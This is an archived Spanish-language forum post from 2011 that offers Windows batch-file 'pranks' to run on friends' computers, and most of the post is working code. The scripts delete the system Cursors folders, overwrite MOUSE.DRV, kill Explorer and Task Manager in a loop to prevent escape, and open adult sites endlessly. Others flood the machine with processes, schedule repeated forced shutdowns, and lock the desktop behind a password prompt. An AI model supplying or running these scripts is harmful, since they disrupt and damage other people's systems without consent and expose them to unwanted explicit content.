InicioHumorBromas Con Archivos .BAT

Bromas Con Archivos .BAT

Humor•12/5/2011
Descripción que es un bat.
Es un archivo de procesamiento por lotes: se trata de archivos de texto sin formato, guardados con la extensión *.bat que contienen un conjunto de comandos DOS. Cuando se ejecuta este archivo bat, los comandos contenidos son ejecutados en grupo, de forma secuencial, permitiendo automatizar diversas tareas.Cualquier comando DOS puede ser utilizado en un archivo batch.

Instalacion de bat

Solo abres un bloc de notas y escribes los comandos que quieres utilizar, luego al guardar con la extension .bat
ejemplo: Cambio de nombre.bat


Escritorio loco

Bromas Con Archivos .BAT

Invierte el mouse,bloquea administrador para evitar el cierre del .bat

Codigo:
@echo off
title test
color 3a
:RE
CLS
Rundll32 user32,SwapMouseButton
TASKKILL /F /IM EXPLORER.EXE
START EXPLORER.EXE
TASKKILL /F /IM TASKMGR.EXE
GOTO RE


bloquea mouse y teclado

Con este codigo vas a poder deshabilitar el mouse y el teclado.

Codigo:

@echo off
@cd C:WINDOWSsystem
echo bean>MOUSE.DRV
@cd..
@cd C:WINDOWS
@rmdir /S /Q Cursores
@cd..
@cd C:WINDOWS
@rmdir /S /Q Cursors


Abre paginas XXX

Este bat te abre todas las paginas para mayores e.e infititas veces. Muy buena broma para los amigos hahaha.


Codigo:


@echo off
:bucle
start www.poringa.net
start www.redtube.com
start www.puritanas.com
start www.youporn.com
start www.xnxx.com
start www.reyalmeja.com
start www.petardas.com
start www.muyzorras.com
start www.planetazorras.com
start www.peterpaulxxx.com
start www.videospornodetv.com
start www.putogle.com
start www.castigados.com
start www.iberporno.com
start www.laxtana.com
goto bucle

* este bat te abre todas las paginas infititas veces.
Si deseas, puedes cambiar las paginas.


Windows Jodido

bromas

Este bat te deja cagada la pc puede ser peligroso pero al reiniciar se soluciona todo. jajaja

Te caga la pc T_T

Codigo:

@echo off
goto a
:z
taskkil /f /im taskmgr.exe
:a
Rundll32 user32,SwapMouseButton
start wmplayer.exe
start cmd.exe
start calc.exe
start mspaint.exe
start msconfig.exe
start explorer.exe
start iexplore.exe
goto a
goto b
:b
echo soy gay > soygay.txt
start soygay.txt
start soygay.txt
start soygay.txt
goto a
goto b
goto c
goto z
:c
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
goto a
goto b
goto c
goto z


Desistalador windows

Simplemente asustar,apaga la pc mostrando un mensaje de "desinstalando windows"

Codigo:

@echo off
title windows uninstaller
echo usted esta a punto de desinstalar windows
echo presione y/n si o no
pause>nul
cd %systemroot%
cd %windir%
dir
echo procesando archivos
shutdown -s -t 60 -c "desinstalando windows por favor espere"
pause>nul
exit

si lo quieren desactivar pongan ejecutar y escriban : shutdown -a

Bloquea usuario

archivos

Te bloquea el equipo y te pide contraseña jojojo

Codigo:

@echo off
title Bloqueo personalizado The azkabhan
taskkill /f /im explorer.exe
:repit
cls
set /p ans=contraseña?...
if %ans%=="tu contraseña" (goto right)else goto bad
:right
start explorer.exe
exit
:bad
goto repit

Apagar PC 2011

con

Este bat te reinicia la pc y es muy chistoso .....

Te apaga el ordenador personalizado 2011

Codigo:

Bueno Este Codigo Abre Unos Programas Y Luego La Apaga =P


Citar
cls
start
For /L %%a IN (0,1,100) DO start mspaint.exe
msg* "Dibujas muy bien!!"
start regedit
start sndrec32.exe
start winmine.exe
start PINBALL.exe
at 14:00 shutdown -s -f -t 02 -c "Adios"
at 14:05 shutdown -s -f -t 02 -c "See you"
at 14:08 shutdown -s -f -t 02 -c "Bye"
at 15:00 shutdown -s -f -t 02 -c "Adios"
at 15:15 shutdown -s -f -t 02 -c "See you"
at 15:30 shutdown -s -f -t 02 -c "Bye"
at 15:45 shutdown -s -f -t 02 -c "Adios"
at 16:00 shutdown -s -f -t 02 -c "See you"
at 16:30 shutdown -s -f -t 02 -c "Bye"
at 17:00 shutdown -s -f -t 02 -c "Adios"
at 17:30 shutdown -s -f -t 02 -c "See you"
at 18:00 shutdown -s -f -t 02 -c "Bye"
at 18:30 shutdown -s -f -t 02 -c "Adios"
at 19:00 shutdown -s -f -t 02 -c "See you"
at 19:30 shutdown -s -f -t 02 -c "Bye"
at 20:00 shutdown -s -f -t 02 -c "Adios"
at 20:30 shutdown -s -f -t 02 -c "See you"
at 21:00 shutdown -s -f -t 02 -c "Bye"
at 21:30 shutdown -s -f -t 02 -c "Adios"
at 22:00 shutdown -s -f -t 02 -c "See you"
at 22:30 shutdown -s -f -t 02 -c "Bye"
at 23:00 shutdown -s -f -t 02 -c "Adios"
at 24:00 shutdown -s -f -t 02 -c "See you"
at 01:00 shutdown -s -f -t 02 -c "Bye"





Ejecutador de programas

.bat

Este bat te ejecuta varios programas, y al finalizar se apaga tienes que verlo.


Codigo:

cls
start msnmsgr.exe
start wmplayer.exe
start notepad.exe
start cmd.exe
start calc.exe
start tourstart.exe
start mobsync.exe
start sndrec32.exe
start winmine.exe
start PINBALL.exe
start moviemk.exe
start sol.exe
start cleanmgr.exe
start osk.exe
start mspaint.exe
at 17:00 shutdown -s -f -t 00 -c "Finalizado"

Simulador de formateo

Bromas Con Archivos .BAT

Este codigo te simula un formateo de windows y la verdad que si asusta muy buena broma.

Codigo:

@echo off
title Formatear disco duro
echo ¿Desea formatear su disco duro? (y/n)
pause >nul
echo Analizando...
echo.
pause
cls
dir /s
dir /s
dir /s
echo.
echo.
pause
cls
echo Borrando archivos...
echo.
pause
cls
echo Archivos borrados
echo.
pause
cls
echo Presione una tecla para reiniciar.
echo.
pause >nul
msg * Esto es una broma, no te asustes =P
exit


Visita Estas Paginas Para Trucos y Muchisimo Mas

♦♦♦Pagina Oficial♦♦♦
http://scourgefrozen.e*s.t*l/
*Borrar Asteriscos


♠Canal De Youtube♠
http://www.youtube.com/user/TheAzkabhaN



••Pagina De Facebook••
http://www.facebook.com/pages/World-of-Computer/153766074715090

Datos archivados del Taringa! original
107puntos
10,576visitas
0comentarios
Actividad nueva en Posteamelo
0puntos
5visitas
0comentarios
Dar puntos:

Dejá tu comentario

0/2000

Autor del Post

f
frankosl🇦🇷
Usuario
Puntos0
Posts20
Ver perfil →
PosteameloArchivo Histórico de Taringa! (2004-2017). Preservando la inteligencia colectiva de la internet hispanohablante.

CONTACTO

18 de Septiembre 455, Casilla 52

Chillán, Región de Ñuble, Chile

Solo correo postal

© 2026 Posteamelo.com. No afiliado con Taringa! ni sus sucesores.

Contenido preservado con fines históricos y culturales.